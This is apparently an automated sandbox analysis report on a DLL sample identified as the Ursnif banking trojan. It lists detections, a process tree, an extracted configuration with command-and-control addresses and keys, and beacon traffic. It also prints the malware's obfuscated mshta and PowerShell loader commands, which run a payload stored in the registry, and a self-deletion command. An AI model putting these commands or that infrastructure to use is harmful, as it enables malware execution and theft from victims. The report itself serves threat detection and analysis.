
Windows Analysis Report
VoevdOQpeU.dll

Overview

General Information

Sample Name: VoevdOQpeU.dll
Analysis ID: 614287
MD5: ba155d8aed7ca303fcfc3f0248d218e1
SHA1: 600453c21cdbecdbea9c825df4754b8a1829d649
SHA256: a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1428 cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6956 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 7132 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6532 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 5388 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup
Malware Configuration

{
  "RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=",
  "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"],
  "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"],
  "serpent_key": "Q8tR9QJN7lLzOLle",
  "tor32_dll": "file://c:\\test\\test32.dll",
  "tor64_dll": "file://c:\\test\\tor64.dll",
  "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*",
  "server": "50",
  "sleep_time": "1",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60",
  "time_value": "60",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "999",
  "SetWaitableTimer_value": "1"
}
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(15 further entries not shown in this extract)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.48994a0.7.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.rundll32.exe.49f0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.48994a0.7.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.4e7a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.4f26940.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(2 further entries not shown in this extract)

System Summary

Source: File created; Author: Florian Roth; Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Thread created; Author: Nikita Nazarov, oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
Source: Thread created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth; Data: Command: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ProcessId: 5292, ProcessName: rundll32.exe
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6956, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 7132, ProcessName: rundll32.exe
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, ProcessId: 6788, ProcessName: csc.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6612, TargetFilename: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132951679509388866.6612.DefaultAppDomain.powershell
Source: Process started; Author: frack113; Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6644, ProcessName: conhost.exe
Timestamp: 04/23/22-08:12:19.910177 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:12:21.823792 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:11:59.593120 | SID: 2033203 | Source Port: 49760 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:12:20.776897 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected


AV Detection

Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp; Malware Configuration Extractor: Ursnif (configuration as listed in the Malware Configuration section above)
Source: VoevdOQpeU.dll; ReversingLabs: Detection: 38%
Source: VoevdOQpeU.dll; Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_049F3072
Source: VoevdOQpeU.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb; source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb; source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
Source: Binary string: ntdll.pdbUGP; source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0580FCC0
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_0580CE21
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_05805A14
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0580591B

Networking

Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.42.16:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.42.16:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49766 -> 146.70.35.138:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49766 -> 146.70.35.138:80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 146.70.35.138 80
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View; ASN Name: TENET-1ZA
Source: Joe Sandbox View; IP Address: 146.70.35.138
Source: global traffic; HTTP traffic detected:
    GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: 146.70.35.138
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: 146.70.35.138
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: 146.70.35.138
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 146.70.35.138 (reported 50 times; identical repeats omitted)
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_049F4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_049F4CC6
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
